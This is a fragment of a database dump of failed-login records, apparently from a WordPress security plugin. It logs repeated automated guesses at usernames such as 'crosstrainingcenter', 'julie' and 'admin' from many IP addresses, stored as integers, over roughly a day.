(103737, 1499967945.246863, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 520125869, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103738, 1499967945.298617, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1474582670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103739, 1499967946.308686, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1474582670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103740, 1499968049.308259, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1706422897, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103741, 1499968051.068140, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1706422897, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103742, 1499968331.876484, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 737221779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103743, 1499968333.138881, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 737221779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103744, 1499968500.130177, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335233595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103745, 1499968501.095176, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335233595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103746, 1499970108.763730, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982802832, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103747, 1499970110.283150, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982802832, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103748, 1499970519.034060, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1579299347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103749, 1499970520.018434, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1579299347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103750, 1499973443.560573, 1, 'loginFailValidUsername', 'julie', 2, 921460302, ''),
(103751, 1499974328.745129, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1363407118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103752, 1499974330.156745, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1363407118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103753, 1499975143.352178, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1332022548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103754, 1499975145.470693, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1332022548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103755, 1499977136.349008, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1357239457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103756, 1499977137.309758, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1357239457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103757, 1499978056.997360, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1834801081, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103758, 1499978058.153834, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1834801081, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103759, 1499982016.256832, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3378439150, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103760, 1499982017.703514, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3378439150, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103761, 1499985642.197314, 1, 'loginFailValidUsername', 'julie', 2, 584228837, ''),
(103762, 1499987606.656036, 1, 'loginFailValidUsername', 'julie', 2, 918256259, ''),
(103763, 1499988861.745863, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1773860999, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103764, 1499988863.388740, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1773860999, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103765, 1499989888.645228, 1, 'loginFailValidUsername', 'julie', 2, 583622267, ''),
(103766, 1499991455.983873, 1, 'loginFailValidUsername', 'julie', 2, 919156026, ''),
(103767, 1499991721.383256, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1451111390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103768, 1499991723.357914, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1451111390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103769, 1499993182.853474, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3197462569, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103770, 1499993631.706255, 1, 'loginFailValidUsername', 'julie', 2, 2927706329, ''),
(103771, 1499994082.741680, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702461109, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103772, 1499995185.849019, 1, 'loginFailValidUsername', 'julie', 2, 3438069403, ''),
(103773, 1499995226.669498, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3301487042, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103774, 1499995228.194064, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3301487042, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103775, 1499996230.463095, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1443763374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103776, 1499996231.441462, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1443763374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103777, 1499996608.756485, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892882789, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103778, 1499996610.565622, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892882789, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103779, 1500000328.946344, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3588843488, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103780, 1500000330.259801, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3588843488, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103781, 1500000947.895244, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1110582034, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103782, 1500000949.106954, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1110582034, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103783, 1500001332.375868, 1, 'loginFailValidUsername', 'julie', 2, 920891349, ''),
(103784, 1500001758.400657, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3082189155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103785, 1500001760.020817, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3082189155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103786, 1500006725.000887, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2115444782, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103787, 1500006726.440368, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2115444782, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103788, 1500007363.371753, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1415292827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103789, 1500007364.409847, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1415292827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103790, 1500007368.573293, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1590645433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103791, 1500007369.803918, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1590645433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103792, 1500008984.863994, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 690623637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103793, 1500008986.280983, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 690623637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103794, 1500011635.316414, 1, 'loginFailValidUsername', 'julie', 2, 585452219, ''),
(103795, 1500011864.854384, 1, 'loginFailInvalidUsername', 'test', 0, 3577295515, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103796, 1500012406.518817, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1463988859, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103797, 1500012407.497134, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1463988859, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103798, 1500012916.126961, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 658243494, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103799, 1500012918.671363, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 658243494, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103800, 1500013383.531362, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657181830, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103801, 1500013384.860933, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657181830, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103802, 1500013749.497765, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.73.10 (KHTML, like Gecko) Chrome/55.1.6185.0813 Safari/532.02 OPR/42.9.4462.9190'),
(103803, 1500014026.612204, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3032363601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103804, 1500014028.118837, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3032363601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103805, 1500018461.058613, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050272050, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103806, 1500018462.549230, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050272050, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103807, 1500020999.523213, 1, 'loginFailValidUsername', 'julie', 2, 921460942, ''),
(103808, 1500021168.361468, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549958265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103809, 1500021169.536429, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549958265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103810, 1500022418.464929, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1315283100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103811, 1500022419.683405, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1315283100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103812, 1500022810.988574, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976134945, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103813, 1500022813.255190, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976134945, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103814, 1500023470.928661, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 455217818, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103815, 1500024185.621304, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831750083, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103816, 1500024187.360498, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831750083, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103817, 1500024884.297747, 1, 'loginFailInvalidUsername', 'test', 0, 1577771674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103818, 1500024885.451573, 1, 'loginFailInvalidUsername', 'test', 0, 1577771674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103819, 1500026583.867859, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946418978, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103820, 1500026586.486761, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946418978, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103821, 1500027974.355758, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945033693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103822, 1500027975.836818, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945033693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103823, 1500031344.857782, 1, 'loginFailValidUsername', 'julie', 2, 919161641, ''),
(103824, 1500031576.002061, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3018581141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103825, 1500031577.349734, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3018581141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103826, 1500032599.515394, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 701435096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103827, 1500032604.139943, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 701435096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103828, 1500034165.987840, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549204432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103829, 1500034167.939453, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549204432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103830, 1500035653.320581, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 697075893, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103831, 1500035654.886599, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 697075893, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103832, 1500036575.441883, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 453444155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103833, 1500036576.693087, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 453444155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103834, 1500037485.323757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1406382124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103835, 1500037486.664616, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1406382124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103836, 1500038716.039133, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(103837, 1500041153.702336, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2039252651, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103838, 1500041155.208940, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2039252651, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103839, 1500041312.094468, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 638916126, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103840, 1500041313.430547, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 638916126, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103841, 1500042019.922070, 1, 'loginFailValidUsername', 'julie', 2, 585410037, ''),
(103842, 1500044693.855809, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 737942384, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103843, 1500044696.517566, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 737942384, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103844, 1500047505.948147, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1480601225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103845, 1500047506.886963, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1480601225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103846, 1500048259.217492, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781787123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103847, 1500048261.036797, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781787123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103848, 1500048293.808964, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1337027635, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103849, 1500051510.797021, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 771326399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103850, 1500051512.252585, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 771326399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103851, 1500052505.572951, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 583622267, ''),
(103852, 1500054931.411478, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 634555953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103853, 1500056202.709559, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2922252163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103854, 1500056204.092471, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2922252163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103855, 1500056529.727493, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1225153788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103856, 1500056531.253270, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1225153788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103857, 1500057403.553510, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3220959133, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103858, 1500057404.926957, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3220959133, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103859, 1500057690.813412, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694781465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103860, 1500057692.411618, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694781465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103861, 1500060752.942899, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3725124862, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103862, 1500060754.452926, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3725124862, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103863, 1500060777.219020, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 6.0; WOW64; rv:52.52.04) Gecko/20163724 Firefox/52.52.04'),
(103864, 1500062586.571111, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 404453904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103865, 1500063161.092274, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 692377094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103866, 1500063614.026302, 1, 'loginFailValidUsername', 'julie', 2, 584376477, ''),
(103867, 1500064145.800931, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3196974798, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103868, 1500064147.145413, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3196974798, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103869, 1500064276.647239, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2535351384, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103870, 1500064278.250968, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2535351384, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103871, 1500064710.802176, 1, 'loginFailInvalidUsername', 'wpupdatestream', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.13.66 (KHTML, like Gecko) Version/4.6.2 Safari/533.21'),
(103872, 1500069328.095825, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1532173984, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103873, 1500069329.179933, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1532173984, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103874, 1500073516.026842, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1376975531, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103875, 1500073872.840681, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 90998243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103876, 1500073876.484860, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 90998243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103877, 1500075515.098570, 1, 'loginFailValidUsername', 'julie', 2, 918495289, ''),
(103878, 1500081797.192663, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1128575345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103879, 1500081798.473424, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1128575345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103880, 1500082460.791539, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3151272036, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103881, 1500082462.062722, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3151272036, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103882, 1500087266.709797, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3141400205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103883, 1500087688.250323, 1, 'loginFailValidUsername', 'julie', 2, 585330554, ''),
(103884, 1500094419.789115, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1293927825, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103885, 1500095028.556081, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1978994662, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103886, 1500095030.114926, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1978994662, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
